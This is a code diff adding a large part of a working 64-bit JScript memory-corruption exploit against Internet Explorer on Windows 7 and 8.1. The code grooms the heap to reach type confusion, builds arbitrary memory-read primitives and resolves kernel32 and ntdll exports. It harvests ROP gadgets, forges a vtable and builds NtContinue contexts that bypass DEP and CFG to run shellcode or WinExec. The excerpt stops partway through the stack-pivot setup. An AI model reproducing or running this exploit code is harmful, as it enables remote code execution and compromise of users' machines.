+ var TotalExports = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + EATRva + 0x14));
+ var AddressRvas = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + EATRva + 0x1C));
+ var NameRvas = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + EATRva + 0x20));
+ var OrdinalRvas = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + EATRva + 0x24));
+ var MaxIndex = TotalExports;
+ var MinIndex = 0;
+ var CurrentIndex = Math.floor(TotalExports / 2);
+ var TargetTableIndex = 0;
+ var BinRes = 0;
+ var TrailingNullWord = false;
+
+ if((TargetExportNameTable[TargetExportNameTable.length - 1] & 0xFFFFFF00) == 0) {
+ TrailingNullWord = true;
+ }
+
+ while(TotalExports) {
+ var CurrentNameRva = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + NameRvas + 4*CurrentIndex));
+
+ while (TargetTableIndex < TargetExportNameTable.length) {
+ var CurrentNameWord = LeakWord64(MakeQword(ModuleBase.high, ModuleBase.low + (CurrentNameRva + (4 * TargetTableIndex))));
+ var TargetExportNameWord = (TargetExportNameTable[TargetTableIndex] & 0x0000FFFF);
+ var SanitizedCurrentNameWord = NullSanitizeWord(CurrentNameWord);
+ var FinalTableIndex = false;
+
+ if((TargetTableIndex + 1) >= TargetExportNameTable.length) {
+ FinalTableIndex = true;
+ }
+
+ BinRes = BinaryCmp(TargetExportNameWord, SanitizedCurrentNameWord);
+
+ if(!BinRes) {
+ TargetExportNameWord = ((TargetExportNameTable[TargetTableIndex] & 0xFFFF0000) >> 16);
+ CurrentNameWord = LeakWord64(MakeQword(ModuleBase.high, ModuleBase.low + (CurrentNameRva + (4 * TargetTableIndex)) + 2));
+ SanitizedCurrentNameWord = NullSanitizeWord(CurrentNameWord);
+
+ if(TrailingNullWord && FinalTableIndex) {
+ var Ordinal = LeakWord64(MakeQword(ModuleBase.high, ModuleBase.low + OrdinalRvas + 2*CurrentIndex));
+ var MainExport = MakeQword(ModuleBase.high, ModuleBase.low + LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + AddressRvas + 4*Ordinal)));
+ return MainExport;
+ }
+
+ BinRes = BinaryCmp(TargetExportNameWord, SanitizedCurrentNameWord);
+
+ if(!BinRes) {
+ if(FinalTableIndex) {
+ var Ordinal = LeakWord64(MakeQword(ModuleBase.high, ModuleBase.low + OrdinalRvas + 2*CurrentIndex));
+ var MainExport = MakeQword(ModuleBase.high, ModuleBase.low + LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + AddressRvas + 4*Ordinal)));
+ return MainExport;
+ }
+
+ TargetTableIndex++;
+ }
+ else {
+ TargetTableIndex = 0;
+ break;
+ }
+ }
+ else {
+ TargetTableIndex = 0;
+ break;
+ }
+ }
+
+ if(BinRes == 1) { // Target is greater than what it was compared to: reduce current index
+ if(MaxIndex == CurrentIndex) {
+ DebugLog("Failed to find export: index hit max");
+ break;
+ }
+
+ MaxIndex = CurrentIndex;
+ CurrentIndex = Math.floor((CurrentIndex + MinIndex) / 2);
+ }
+ else if (BinRes == -1) { // Target is less than what it was compared to: enhance current index
+ if(MinIndex == CurrentIndex) {
+ DebugLog("Failed to find export: index hit min");
+ break;
+ }
+
+ MinIndex = CurrentIndex;
+ CurrentIndex = Math.floor((CurrentIndex + MaxIndex) / 2);
+ }
+
+ if(CurrentIndex == MaxIndex && CurrentIndex == MinIndex) {
+ DebugLog("Failed to find export: current, min and max indexes are all equal");
+ break;
+ }
+ }
+ }
+
+ return MakeQword(0, 0);
+}
+
+function SelectRandomImport64(ModuleBase, TargetModuleNameTable) { // Grab the first IAT entry of a function within the specified module
+ var ExtractedAddresss = MakeQword(0, 0);
+ var FileHdrRva = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + 0x3c));
+ var ImportDataDirAddress = MakeQword(ModuleBase.high, ModuleBase.low + FileHdrRva + 0x90); // Import data directory
+ var ImportRva = LeakDword64(ImportDataDirAddress);
+ var ImportSize = LeakDword64(MakeQword(ImportDataDirAddress.high, ImportDataDirAddress.low + 0x4)); // Get the size field of the import data dir
+ var DescriptorAddress = MakeQword(ModuleBase.high, ModuleBase.low + ImportRva);
+
+ while(ImportSize != 0) {
+ var NameRva = LeakDword64(MakeQword(DescriptorAddress.high, DescriptorAddress.low + 0xc)); // 0xc is the offset to the module name pointer
+
+ if(NameRva != 0) {
+ if(StrcmpLeak64(TargetModuleNameTable, MakeQword(ModuleBase.high, ModuleBase.low + NameRva))) {
+ var ThunkRva = LeakDword64(MakeQword(DescriptorAddress.high, DescriptorAddress.low + 0x10));
+ ExtractedAddresss = LeakQword64(MakeQword(ModuleBase.high, ModuleBase.low + ThunkRva + 0x18)); // +0x18 (4 thunks forwarded) since __imp___C_specific_handler can cause issues when imported in some jscript instances, and similarly on Windows 10 the 2nd import is ResolveDelayLoadedAPI which is forwarded to NTDLL.DLL.
+ break;
+ }
+
+ ImportSize -= 0x14;
+ DescriptorAddress.low += 0x14; // Next import descriptor in array
+ }
+ else {
+ break;
+ }
+ }
+
+ return ExtractedAddresss;
+}
+
+function DiveModuleBase64(Address) {
+ Address.low = (Address.low & 0xFFFF0000) + 0x4e; // Offset of "This program cannot be run in DOS mode" in PE header.
+
+ while(true) {
+ if(LeakWord64(Address) == 0x6854) { // 'hT'
+ if(LeakWord64(MakeQword(Address.high, Address.low + 2)) == 0x7369) { // 'si'
+ return MakeQword(Address.high, Address.low - 0x4e);
+ }
+ }
+
+ Address.low -= 0x10000;
+ }
+
+ return MakeQword(0, 0);
+}
+
+function BaseFromImports64(ModuleBase, TargetModuleNameTable) {
+ var RandomImportAddress = SelectRandomImport64(ModuleBase, TargetModuleNameTable);
+
+ if(RandomImportAddress.low || RandomImportAddress.high) {
+ return DiveModuleBase64(RandomImportAddress);
+ }
+
+ return MakeQword(0, 0);
+}
+
+////////
+////////
+// Misc. helper functions
+////////
+
+function NullSanitizeWord(StrWord) {
+ var Sanitized = 0;
+
+ if(StrWord != 0) {
+ if((StrWord & 0x00FF) == 0) {
+ Sanitized = 0; // First byte is NULL, end of the string.
+ }
+ else {
+ Sanitized = StrWord;
+ }
+ }
+
+ return Sanitized;
+}
+
+function BinaryCmp(TargetNum, CmpNum) { // return -1 for TargetNum being greater, 0 for equal, 1 for CmpNum being greater
+ if(TargetNum == CmpNum) {
+ return 0;
+ }
+
+ while(true) {
+ if((TargetNum & 0xff) > (CmpNum & 0xff)) {
+ return -1;
+ }
+ else if((TargetNum & 0xff) < (CmpNum & 0xff)) {
+ return 1;
+ }
+
+ TargetNum = TargetNum >> 8;
+ CmpNum = CmpNum >> 8;
+ }
+}
+
+function DwordToUnicode(Dword) {
+ var Unicode = String.fromCharCode(Dword & 0xFFFF);
+ Unicode += String.fromCharCode(Dword >> 16);
+ return Unicode;
+}
+
+function QwordToUnicode(Value) {
+ return String.fromCharCode.apply(null, [Value.low & 0xffff, (Value.low >> 16) & 0xffff, Value.high & 0xffff, (Value.high >> 16) & 0xffff]);
+}
+
+function TableToUnicode(Table) {
+ var Unicode = "";
+
+ for(var i = 0; i < Table.length; i++) {
+ Unicode += DwordToUnicode(Table[i]);
+ }
+
+ return Unicode;
+}
+
+function DwordArrayToBytes(DwordArray) {
+ var ByteArray = [];
+
+ for(var i = 0; i < DwordArray.length; i++) {
+ ByteArray.push(DwordArray[i] & 0xffff);
+ ByteArray.push((DwordArray[i] & 0xffff0000) >> 16);
+ }
+
+ return String.fromCharCode.apply(null, ByteArray);
+}
+
+function StrcmpLeak64(StrDwordTable, LeakAddress) { // Compare two strings between an array of WORDs and a string at a memory address
+ var TargetTableIndex = 0;
+
+ while (TargetTableIndex < StrDwordTable.length) {
+ var LeakStrWord = LeakWord64(MakeQword(LeakAddress.high, LeakAddress.low + (4 * TargetTableIndex)));
+ var SanitizedStrWord = NullSanitizeWord(LeakStrWord);
+ var TableWord = (StrDwordTable[TargetTableIndex] & 0x0000FFFF);
+
+ if(TableWord == SanitizedStrWord) {
+ LeakStrWord = LeakWord64(MakeQword(LeakAddress.high, LeakAddress.low + (4 * TargetTableIndex) + 2));
+ SanitizedStrWord = NullSanitizeWord(LeakStrWord);
+ TableWord = ((StrDwordTable[TargetTableIndex] & 0xFFFF0000) >> 16);
+
+ if(TableWord == SanitizedStrWord) {
+ if((TargetTableIndex + 1) >= StrDwordTable.length) {
+ return true;
+ }
+
+ TargetTableIndex++;
+ }
+ else {
+ break;
+ }
+ }
+ else {
+ break;
+ }
+ }
+
+ return false;
+}
+
+function MakeDouble(High, Low) {
+ return Int52ToDouble(QwordToInt52(High, Low));
+}
+
+function QwordToInt52(High, Low) {
+ // Sanity check via range. Not all QWORDs are going to be valid 52-bit integers that can be converted to doubles
+
+ if ((Low !== Low|0) && (Low !== (Low|0)+4294967296)) {
+ DebugLog ("Low out of range: 0x" + Low.toString(16));
+ }
+
+ if (High !== High|0 && High >= 1048576) {
+ DebugLog ("High out of range: 0x" + High.toString(16));
+ }
+
+ if (Low < 0) {
+ Low += 4294967296;
+ }
+
+ return High * 4294967296 + Low;
+}
+
+function Int52ToDouble(Value) {
+ var Low = Value | 0;
+
+ if (Low < 0) {
+ Low += 4294967296;
+ }
+
+ var High = Value - Low;
+
+ High /= 4294967296;
+
+ if ((High < 0) || (High >= 1048576)) {
+ DebugLog("Fatal error - not an int52: 0x" + Value.toString(16));
+ Loew = 0;
+ High = 0;
+ }
+
+ return { low: Low, high: High };
+}
+
+function MakeQword(High, Low) {
+ return { low: Low, high: High };
+}
+
+////////
+////////
+// Dynamic ROP chain creation code
+////////
+
+function HarvestGadget64(HintExportAddress, MaxDelta, Data, DataMask, MagicOffset) {
+ var MaxHighAddress = MakeQword(HintExportAddress.high, (HintExportAddress.low + MagicOffset + MaxDelta));
+ var MinLowAddress = MakeQword(HintExportAddress.high, ((HintExportAddress.low + MagicOffset) - MaxDelta));
+ var LeakAddress = MakeQword(HintExportAddress.high, HintExportAddress.low + MagicOffset);
+ var LeakFunc = LeakDword64; // Leaking by DWORD causes some quirks on 64-bit. Bitwise NOT solves issue.
+ var InitialAddress = LeakAddress;
+ var IndexDelta;
+
+ if(MinLowAddress.low < HintExportAddress.low) {
+ MinLowAddress.low = HintExportAddress.low; // Don't bother scanning below the hint export
+ }
+
+ DebugLog("Hunting for gadget 0x" + Data.toString(16) + " between 0x" + MinLowAddress.high.toString(16) + MinLowAddress.low.toString(16) + " and 0x" + MaxHighAddress.high.toString(16) + MaxHighAddress.low.toString(16) + " starting from 0x" + LeakAddress.high.toString(16) + LeakAddress.low.toString(16) + " based on hint export at 0x" + HintExportAddress.high.toString(16) + HintExportAddress.low.toString(16));
+
+ if(DataMask == 0x0000FFFF) {
+ LeakFunc = LeakWord64;
+ }
+
+ var LeakedData = LeakFunc(LeakAddress);
+
+ if((~LeakedData & DataMask) == ~Data) {
+ DebugLog("Found gadget at expected delta of " + MagicOffset.toString(16));
+ }
+ else {
+ var HighAddress = MakeQword(LeakAddress.high, LeakAddress.low + 1);
+ var LowAddress = MakeQword(LeakAddress.high, LeakAddress.low - 1);
+
+ LeakAddress = MakeQword(0, 0);
+
+ while(LowAddress.low >= MinLowAddress.low || HighAddress.low < MaxHighAddress.low) {
+ if(LowAddress.low >= MinLowAddress.low) {
+ LeakedData = LeakFunc(LowAddress);
+
+ if((~LeakedData & DataMask) == ~Data) {
+ DebugLog("Found gadget from scan below magic at 0x" + LowAddress.high.toString(16) + LowAddress.low.toString(16));
+ LeakAddress = LowAddress;
+ break;
+ }
+
+ LowAddress.low -= 1;
+ }
+
+ if(HighAddress.low < MaxHighAddress.low) {
+ LeakedData = LeakFunc(HighAddress);
+
+ if((~LeakedData & DataMask) == ~Data) {
+ LeakAddress = HighAddress;
+ IndexDelta = (LeakAddress.low - InitialAddress.low);
+ DebugLog("Found gadget from scan above magic at 0x" + HighAddress.high.toString(16) + HighAddress.low.toString(16) + " (index " + IndexDelta.toString(10) + ")");
+ break;
+ }
+
+ HighAddress.low += 1;
+ }
+ }
+ }
+
+ return LeakAddress;
+}
+
+////////
+////////
+// Primary high level exploit logic
+////////
+
+function MakeContextDEPBypass64(NewRSP, ArtificialStackAddress, StackPivotAddress, VirtualProtectAddress, ShellcodeAddress, ShellcodeSize, WritableAddress) {
+ return "\u0000\u0000\u0000\u0000" + // P3Home
+ "\u0000\u0000\u0000\u0000" + // P4Home
+ "\u0000\u0000\u0000\u0000" + // P5Home
+ "\u0000\u0000\u0000\u0000" + // P6Home
+ "\u0003\u0010" + // ContextFlags
+ "\u0000\u0000" + // MxCsr
+ "\u0033" + // SegCs
+ "\u0000" + // SegDs
+ "\u0000" + // SegEs
+ "\u0000" + // SegFs
+ "\u0000" + // SegGs
+ "\u002b" + // SegSs
+ "\u0246\u0000" + // EFlags
+ "\u0000\u0000\u0000\u0000" + // Dr0 - Prevents EAF too!
+ "\u0000\u0000\u0000\u0000" + // Dr1
+ "\u0000\u0000\u0000\u0000" + // Dr2
+ "\u0000\u0000\u0000\u0000" + // Dr3
+ "\u0000\u0000\u0000\u0000" + // Dr6
+ "\u0000\u0000\u0000\u0000" + // Dr7
+ "\u0000\u0000\u0000\u0000" + // Rax
+ QwordToUnicode(ShellcodeAddress) + // Rcx
+ QwordToUnicode(ShellcodeSize) + // Rdx
+ "\u0000\u0000\u0000\u0000" + // Rbx
+ QwordToUnicode(NewRSP) + // Rsp
+ "\u0000\u0000\u0000\u0000" + // Rbp
+ "\u0000\u0000\u0000\u0000" + // Rsi
+ "\u0000\u0000\u0000\u0000" + // Rdi
+ "\u0040\u0000\u0000\u0000" + // R8
+ QwordToUnicode(WritableAddress) + // R9
+ "\u0000\u0000\u0000\u0000" + // R10
+ QwordToUnicode(ArtificialStackAddress) + // R11
+ "\u0000\u0000\u0000\u0000" + // R12
+ "\u0000\u0000\u0000\u0000" + // R13
+ "\u0000\u0000\u0000\u0000" + // R14
+ "\u0000\u0000\u0000\u0000" + // R15
+ QwordToUnicode(StackPivotAddress); // RIP
+}
+
+function MakeContextWinExec64(CommandLineAddress, StackPtr, WinExecAddress) {
+ return "\u0000\u0000\u0000\u0000" + // P3Home
+ "\u0000\u0000\u0000\u0000" + // P4Home
+ "\u0000\u0000\u0000\u0000" + // P5Home
+ "\u0000\u0000\u0000\u0000" + // P6Home
+ "\u0003\u0010" + // ContextFlags
+ "\u0000\u0000" + // MxCsr
+ "\u0033" + // SegCs
+ "\u0000" + // SegDs
+ "\u0000" + // SegEs
+ "\u0000" + // SegFs
+ "\u0000" + // SegGs
+ "\u002b" + // SegSs
+ "\u0246\u0000" + // EFlags
+ "\u0000\u0000\u0000\u0000" + // Dr0 - Prevents EAF too!
+ "\u0000\u0000\u0000\u0000" + // Dr1
+ "\u0000\u0000\u0000\u0000" + // Dr2
+ "\u0000\u0000\u0000\u0000" + // Dr3
+ "\u0000\u0000\u0000\u0000" + // Dr6
+ "\u0000\u0000\u0000\u0000" + // Dr7
+ "\u0000\u0000\u0000\u0000" + // Rax
+ QwordToUnicode(CommandLineAddress) + // Rcx - Command pointer
+ "\u0005\u0000\u0000\u0000" + // Rdx - SW_SHOW
+ "\u0000\u0000\u0000\u0000" + // Rbx
+ QwordToUnicode(StackPtr) + // Rsp
+ "\u0000\u0000\u0000\u0000" + // Rbp
+ "\u0000\u0000\u0000\u0000" + // Rsi
+ "\u0000\u0000\u0000\u0000" + // Rdi
+ "\u0000\u0000\u0000\u0000" + // R8
+ "\u0000\u0000\u0000\u0000" + // R9
+ "\u0000\u0000\u0000\u0000" + // R10
+ "\u0000\u0000\u0000\u0000" + // R11
+ "\u0000\u0000\u0000\u0000" + // R12
+ "\u0000\u0000\u0000\u0000" + // R13
+ "\u0000\u0000\u0000\u0000" + // R14
+ "\u0000\u0000\u0000\u0000" + // R15
+ QwordToUnicode(WinExecAddress); // RIP - KERNEL32.DLL!WinExec
+}
+
+function CreateFakeVtable(NtContinueAddress) {
+ var FakeVtable = "";
+ var Padding = [];
+
+ for (var i = 0; i < (0x138 / 4); i++) {
+ Padding[i] = 0x11111111;
+ }
+
+ FakeVtable += DwordArrayToBytes(Padding);
+ FakeVtable += DwordArrayToBytes([NtContinueAddress.low]);
+ FakeVtable += DwordArrayToBytes([NtContinueAddress.high]);
+
+ for (var i = (0x140 / 4); i < (0x400 / 4); i++) {
+ Padding[i] = 0x22222222;
+ }
+
+ FakeVtable += DwordArrayToBytes(Padding);
+ return FakeVtable;
+}
+
+var LFHBlocks = new Array(); // If this is local rather than global the exploit does not work on Windows 8.1 IE11 64-bit
+
+function Exploit() {
+ if(PayloadType != "shellcode" && PayloadType != "winexec") {
+ DebugLog("Fatal error: invalid payload type");
+ return 0;
+ }
+
+ // Initialization: these anchor re-claim counts have varying affects on exploit stability. The higher the anchor count, the more stable, but the more time the exploit will take.
+
+ if(WindowsVersion <= 7) {
+ ReClaimNameList = ReClaimIndexNameList;
+ NameListAnchorCount = 5000; // 20000 was needed prior to using GC at the start of the exploit. Performance went from around 4 seconds to 700ms when moved to 400. 5000 was the sweet spot on Win7 IE8 64-bit between speed and stability.
+ }
+ else {
+ ReClaimNameList = ReClaimBackupNameLists;
+
+ if(PacFile) {
+ NameListAnchorCount = 10000;
+ }
+ else {
+ NameListAnchorCount = 400; // The larger this number the more reliable the exploit on Windows 8.1 where LFH cannot easily re-claim
+ }
+ }
+
+ CollectGarbage(); // This GC is essential for re-claims with randomized LFH on precise regions (such as VVAL re-claim), but it also allows for the GcBlock re-claim count to be drastically reduced (otherwise 20000+ was needed, as in the original exploit)
+
+ // Trigger LFH for a size of 0x970
+
+ for(var i = 0; i < 50; i++) { // Only 50 are needed to activate LFH, but spraying additional allocations seems to help clog existing free memory regions on the heap and improve LFH re-claim reliability on Win8.1+
+ Temp = new Object();
+ Temp[Array(570).join('A')] = 1; // Property name size of 0x239 (569 chars with a default +1 added as a terminator) will produce the desired re-claim allocation size.
+ LFHBlocks.push(Temp);
+ }
+
+ // Re-claim with type confusion NameLists
+
+ NewUntrackedVarSet();
+ DebugLog("Total untracked variables: " + UntrackedVarSet.length.toString(10));
+
+ for(var i = 0; i < NameListAnchorCount; i++) {
+ NameListAnchors[i][SizerPropName] = 1; // 0x239 property name size for 0x970 NameList allocation size
+ NameListAnchors[i]["BBBBBBBBBBB"] = 1; // 11*2 = 22 in 64-bit, 9*2 = 18 bytes in 32-bit
+ NameListAnchors[i]["\u0005"] = 1; // This ends up in the VVAL hash/name length to be type confused with an integer VAR
+ NameListAnchors[i]["C"] = i; // The address of this VVAL will be leaked
+ }
+
+ AnchorObjectsBackup = NameListAnchors; // Backup name list anchor objects (this will allow re-claim to "stick").
+
+ // Leak final VVAL address from one of the NameLists
+
+ var LeakedVvalAddress = 0;
+ var TypeConfusionAligned = false;
+
+ for(var i = 0; i < UntrackedVarSet.length; i++) {
+ if(typeof UntrackedVarSet[i] === "number" && UntrackedVarSet[i] % 1 != 0) {
+ LeakedVvalAddress = (UntrackedVarSet[i] / 4.9406564584124654E-324); // This division just converts the float into an easy-to-read 32-bit number
+ TypeConfusionAligned = true;
+ break;
+ }
+ }
+
+ if(!TypeConfusionAligned) {
+ DebugLog("Leaked anchor object type confusion re-claim failed: no untracked var aligned with type confusion float/next VVAL pointer");
+ return 0;
+ }
+
+ LeakedVvalAddress = Int52ToDouble(LeakedVvalAddress); // In Windows 7, the leaked heap pointer could always be encoded in 32-bits. On Windows 8.1 IE11, it often consumes more. By leaking the final VVAL pointer with a double float we can get the bits we need. Experimenting with this I learned all JS numbers are 52 bits in size. In the event that the leaked pointer has its highest bits set it may be an invalid double. This hasn't be an issue on Windows 7 x64, x86, or Windows 8.1 x64 during my testing.
+
+ if(!LeakedVvalAddress.high && !LeakedVvalAddress.low) {
+ DebugLog("Leaked anchor object type confusion re-claim failed: conversion of leaked VVAL address (type confusion successful) to double failed (invalid 52-bit integer)");
+ return 0;
+ }
+
+ // Re-claim with VAR-referencing-VAR NameLists
+
+ var PrimaryVvalPropName = "AAAAAAAA"; // 16 bytes for size of GcBlock double linked list pointers
+
+ for(var i = 0; i < 46; i++) {
+ PrimaryVvalPropName += CreateVar64(0x80, LeakedVvalAddress.low, LeakedVvalAddress.high, 0, 0); // Type 0x80 is a VAR reference
+ }
+
+ while(PrimaryVvalPropName.length < 0x239) PrimaryVvalPropName += "A";
+
+ // Re-claim with leaked VVAL address vars (to be dereferenced for anchor object index extraction)
+
+ NewUntrackedVarSet();
+
+ for(var i = 0; i < NameListAnchorCount; i++) {
+ NameListAnchors[i][PrimaryVvalPropName] = 1;
+ }
+
+ // Extract NameList anchor index through untracked var dereference to leaked VVAL prefix VAR
+
+ var LeakedVvalVar;
+
+ for(var i = 0; i < UntrackedVarSet.length; i++) {
+ if(typeof UntrackedVarSet[i] === "number") {
+ LeakedAnchorIndex = parseInt(UntrackedVarSet[i] + ""); // Attempting to access the untracked var without parseInt will fail ("null or not an object")
+ LeakedVvalVar = UntrackedVarSet[i]; // The + "" trick alone does not seeem to be enough to populate this with the actual value
+ break;
+ }
+ }
+
+ DebugLog("Leaked anchor object index: " + LeakedAnchorIndex.toString(16));
+
+ // Verify that the VAR within the leaked VVAL can be influenced by directly freeing/re-claiming the NameList associated with the leaked NameList anchor object (whose index is now known)
+
+ ReClaimNameList(0x11, "A");
+
+ if(LeakedVvalVar + "" != 0x11) {
+ DebugLog("Failed to extract final VVAL index via re-claim");
+ return 0;
+ }
+
+ // Create the mutable variable which will be used throughout the remainder of the exploit and re=claim with VAR-referencing-VAR to it for dereference
+
+ ReClaimNameList(0, CreateVar64(0x3, 0x22, 0, 0, 0));
+ PrimaryVvalPropName = "AAAAAAAA"; // 2 wide chars (4 bytes) plus the 4 byte BSTR length gives 8 bytes: the size of the two GcBlock linked list pointers. Everything after this point can be fake VARs and a tail padding.
+
+ for(var i = 0; i < 46; i++) {
+ PrimaryVvalPropName += CreateVar64(0x80, LeakedVvalAddress.low + 0x40, LeakedVvalAddress.high, 0, 0); // +0x40 is the offset to property name field of 64-bit VVAL struct. Type 0x80 is a VAR reference
+ }
+
+ while(PrimaryVvalPropName.length < 0x239) PrimaryVvalPropName += "A"; // Dynamically pad the end of the proeprty name to correct length
+
+ // Re-claim with leaked VVAL name property address vars (this is the memory address of the mutable variable that will be created)
+
+ NewUntrackedVarSet();
+
+ for(var i = 0; i < NameListAnchorCount; i++) {
+ NameListAnchors[i][PrimaryVvalPropName] = 1;
+ }
+
+ for(var i = 0; i < UntrackedVarSet.length; i++) {
+ if(typeof UntrackedVarSet[i] === "number") {
+ if(UntrackedVarSet[i] + "" == 0x22) {
+ MutableVar = UntrackedVarSet[i];
+ break;
+ }
+ }
+ }
+
+ // Verify the mutable var can be changed via simple re-claim
+
+ ReClaimNameList(0, CreateVar64(0x3, 0x33, 0, 0, 0));
+
+ if(MutableVar + "" != 0x33) {
+ DebugLog("Failed to verify mutable variable modification via re-claim");
+ return 0;
+ }
+
+ // Test arbitrary read primitive
+
+ var MutableVarAddress = MakeQword(LeakedVvalAddress.high, LeakedVvalAddress.low + 0x40);
+
+ if(LeakByte64(MutableVarAddress) != 0x8) { // Change mutable var to a BSTR pointing at itself.
+ DebugLog("Memory leak test failed");
+ return 0;
+ }
+
+ // Derive jscript.dll base from leaked Object vtable
+
+ var DissectedObj = new Object();
+ var ObjectAddress = LeakObjectAddress64(LeakedVvalAddress, DissectedObj);
+ var VtableAddress = LeakQword64(ObjectAddress);
+ var JScriptBase = DiveModuleBase64(VtableAddress);
+
+ if(!JScriptBase.low && !JScriptBase.high) {
+ DebugLog("Failed to leak JScript.dll base address");
+ return 0;
+ }
+ else {
+ DebugLog("Leaked JScript base address: 0x" + JScriptBase.high.toString(16) + JScriptBase.low.toString(16));
+ }
+
+ // Extract the first Kernel32.dll import from Jscript.dll IAT to dive for its base
+
+ var Kernel32Base = BaseFromImports64(JScriptBase, [0x4e52454b, 0x32334c45]);
+
+ if(!Kernel32Base.low && !Kernel32Base.high) {
+ DebugLog("Kernel32.dll base resolution via Jscript.dll imports failed.");
+ return 0;
+ }
+ else {
+ DebugLog("Leaked KERNEL32.DLL base address: 0x" + Kernel32Base.high.toString(16) + Kernel32Base.low.toString(16));
+ }
+
+ var VirtualProtectAddress;
+ var WinExecAddress;
+
+ if(PayloadType == "shellcode") {
+ // Resolve APIs for command execution: NTDLL.DLL!NtContinue, KERNEL32.DLL!VirtualProtect
+
+ VirtualProtectAddress = ResolveExport64(Kernel32Base, [ 0x74726956, 0x506c6175, 0x65746f72, 0x00007463 ]); // VirtualProtect
+
+ if(!VirtualProtectAddress.low && !VirtualProtectAddress.high) {
+ DebugLog("Failed to resolve address of KERNEL32.DLL!VirtualProtect");
+ return 0;
+ }
+
+ DebugLog("Successfully resolved address of VirtualProtect to: 0x" + VirtualProtectAddress.high.toString(16) + VirtualProtectAddress.low.toString(16));
+ }
+ else if(PayloadType == "winexec") {
+ // Resolve APIs for command execution: NTDLL.DLL!NtContinue, KERNEL32.DLL!WinExec
+
+ WinExecAddress = ResolveExport64(Kernel32Base, [0x456e6957]);
+
+ if(!WinExecAddress.low && !WinExecAddress.high) {
+ DebugLog("Failed to resolve address of KERNEL32.DLL!WinExec");
+ return 0;
+ }
+ }
+
+ var MsvcrtBase = BaseFromImports64(JScriptBase, [0x6376736d, 0x642e7472]);
+
+ if(!MsvcrtBase.low && !MsvcrtBase.high) {
+ DebugLog("Msvcrt.dll base resolution via Jscript.dll imports failed.");
+ return 0;
+ }
+
+ var NtdllBase = BaseFromImports64(MsvcrtBase, [0x6c64746e, 0x6c642e6c]);
+
+ if(!NtdllBase.low && !NtdllBase.high) {
+ DebugLog("Ntdll.dll base resolution via Msvcrt.dll imports failed.");
+ return 0;
+ }
+
+ var NtContinueAddress = ResolveExport64(NtdllBase, [0x6f43744e, 0x6e69746e]);
+
+ if(!NtContinueAddress.low && !NtContinueAddress.high) {
+ DebugLog("Failed to resolve address of NTDLL.DLL!NtContinue");
+ return 0;
+ }
+
+ // Leak an authentic stack pointer to avoid triggering the stack pivot protection built into CFG on Windows 8.1+ within the kernel layer of NTDLL.DLL!NtContinue
+
+ var CSessionAddress = LeakQword64(MakeQword(ObjectAddress.high, ObjectAddress.low + 24)); // Get CSession from offset 24
+ var LeakedStackPtr = LeakQword64(MakeQword(CSessionAddress.high, CSessionAddress.low + 80));
+ LeakedStackPtr.low += 0x8; // Stack alignment needs to be at a 0x10 boundary prior to CALL
+
+ // Construct a fake vtable and fake object for use within mutable var property name
+
+ var FakeVtable = CreateFakeVtable(NtContinueAddress);
+ FakeVtable = FakeVtable.substr(0, FakeVtable.length);
+ var FakeVtableAddress = LeakObjectAddress64(LeakedVvalAddress, FakeVtable);
+ var MutableVarAddress = MakeQword(LeakedVvalAddress.high, LeakedVvalAddress.low + 0x40);
+ var FakeObjAddress = MakeQword(LeakedVvalAddress.high, LeakedVvalAddress.low + 96);
+ var Context;
+
+ if(PayloadType == "shellcode") {
+ // Allocate memory for shellcode, API output and an artificial stack
+
+ var ShellcodeStr = TableToUnicode(Shellcode);
+ var ShellcodeLen = MakeQword(0, (ShellcodeStr.length * 2));
+ ShellcodeStr = ShellcodeStr.substr(0, ShellcodeStr.length); // This trick is essential to ensure the "address of" primitive gets the actual address of the shellcode data and not another VAR in a chain of VARs (this happens when a VAR is appended to another repeaatedly as is the case here)
+ var ShellcodeAddress = LeakObjectAddress64(LeakedVvalAddress, ShellcodeStr);
+
+ /*
+ Artificial stack data for use beyond the NTDLL.DLL!NtContinue pivot.
+
+
+ NTDLL.DLL!NtContinue --------------------> RIP = | MOV RSP, R11; RET
+ RCX = Shellcode address
+ RDX = Shellcode size
+ R8 = 0x40
+ R9 = Leaked address of BSTR to hold out param
+ RSP = Real stack pointer
+ R11 = Artificial stack
+ |-----------------------------| ^
+ | 2MB stack space (heap) | |
+ |-----------------------------| |
+ | Heap header/BSTR len align | |
+ |-----------------------------| |
+ | KERNEL32.DLL!VirtualProtect | <----------|
+ |-----------------------------|
+ | Shellcode return address ]
+ |-----------------------------|
+ */
+
+ var Padding = Array(0x100000 + 1).join('\u0101'); // The +1 here always gives it a clean len (used to be -1)
+ var ArtificialStackStr = Padding; // A couple KB were never enough, even for VirtualProtect and WinExec. The WPAD RPC client shellcode for sandbox escape is exceptionally consumptive with stack memory.
+ ArtificialStackStr += DwordArrayToBytes([VirtualProtectAddress.low]);
+ ArtificialStackStr += DwordArrayToBytes([VirtualProtectAddress.high]);
+ ArtificialStackStr += DwordArrayToBytes([ShellcodeAddress.low]);
+ ArtificialStackStr += DwordArrayToBytes([ShellcodeAddress.high]);
+ ArtificialStackStr = ArtificialStackStr.substr(0, ArtificialStackStr.length);
+ var ArtificialStackAddress = LeakObjectAddress64(LeakedVvalAddress, ArtificialStackStr);
+ ArtificialStackAddress.low += ((ArtificialStackStr.length * 2) - 0x10); // Point RSP at the return address to the shellcode. The address consistently ends up an 0x8 multiple on Windows 7 IE8 64-bit. Stack overfloow exceptions were becoming an issue when I did not include this tail padding.
+
+ var WritableStr = "";
+ WritableStr += DwordArrayToBytes([0]);
+ WritableStr = WritableStr.substr(0, WritableStr.length);
+ var WritableAddress = LeakObjectAddress64(LeakedVvalAddress, WritableStr);
+
+ // Dynamically resolve ROP gadget for stack pivot via export hint
+
+ var StackPivotAddress;
+ var HintExportAddress = ResolveExport64(MsvcrtBase, [ 0x686e6174, 0x00000066 ]); // tanhf
+ var MagicOffset;
+
+ if(!HintExportAddress.low && !HintExportAddress.high) {
+ DebugLog("Failed to resolve address of MSVCRT.DLL!tanhf");
+ return 0;
+ }
+
+ if(WindowsVersion <= 7) {
+ MagicOffset = 0x2da + 1; // tanhf:0x00076450 (+0x2da) <- 0x0007672a -> (+0x3e5e) ??_7bad_cast@@6B@:0x0007a588
